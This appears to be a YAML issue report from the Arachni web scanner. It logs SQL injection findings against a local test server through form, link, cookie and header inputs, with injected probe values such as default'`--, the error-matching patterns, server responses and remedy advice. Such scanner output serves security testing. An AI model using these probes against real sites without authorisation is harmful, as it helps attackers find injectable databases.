Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/emc/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/emc/form/append
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: input
url: http://localhost:7362/emc/form/append
injected: default'`--
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: form
remarks: {}
method: GET
response: ! '[DM_QUERY_E_SYNTAX]
has occurred in the vicinity of:
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NTM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/emc/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/emc/link/append?input=default
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: input
url: http://localhost:7362/emc/link/append?input=default
injected: default'`--
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: link
remarks: {}
method: GET
response: ! '[DM_QUERY_E_SYNTAX]
has occurred in the vicinity of:
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NTM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/emc/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/emc/link/flip?input=default
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: Parameter flip
url: http://localhost:7362/emc/link/flip?input=default
injected: ''
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: link
remarks: {}
method: GET
response: ! '["[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDoyOSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/emc/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/emc/cookie/flip
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: Parameter flip
url: http://localhost:7362/emc/cookie/flip
injected: ''
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NjQ=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDozMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/emc/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value)
:injected: cookie value)
:combo:
!binary "Y29va2llMg==": cookie value)
:action: http://localhost:7362/emc/cookie/append
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: cookie2
url: http://localhost:7362/emc/cookie/append
injected: cookie value)
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: cookie
remarks: {}
method: GET
response: ! '[DM_QUERY_E_SYNTAX]
has occurred in the vicinity of:
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value)
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NTM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDozMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/emc/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/emc/header/flip
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: Parameter flip
url: http://localhost:7362/emc/header/flip
injected: ''
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "[DM_QUERY_E_SYNTAX]\nhas occurred in the vicinity of:\n", nil,
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjA5
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo0OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/emc/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
:match: ! '[DM_QUERY_E_SYNTAX]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/emc/header/append
:verification:
:id: ! '[DM_QUERY_E_SYNTAX]'
var: User-Agent
url: http://localhost:7362/emc/header/append
injected: arachni_user'`--
id: ! '[DM_QUERY_E_SYNTAX]'
regexp: (?i-mx:\[DM_QUERY_E_SYNTAX\])
regexp_match: ! '[DM_QUERY_E_SYNTAX]'
elem: header
remarks: {}
method: GET
response: ! '[DM_QUERY_E_SYNTAX]
has occurred in the vicinity of:
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NTM=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/sqlite/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/sqlite/form/flip
:verification:
:id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
var: Parameter flip
url: http://localhost:7362/sqlite/form/flip
injected: ''
id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
elem: form
remarks: {}
method: GET
response: ! '["Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
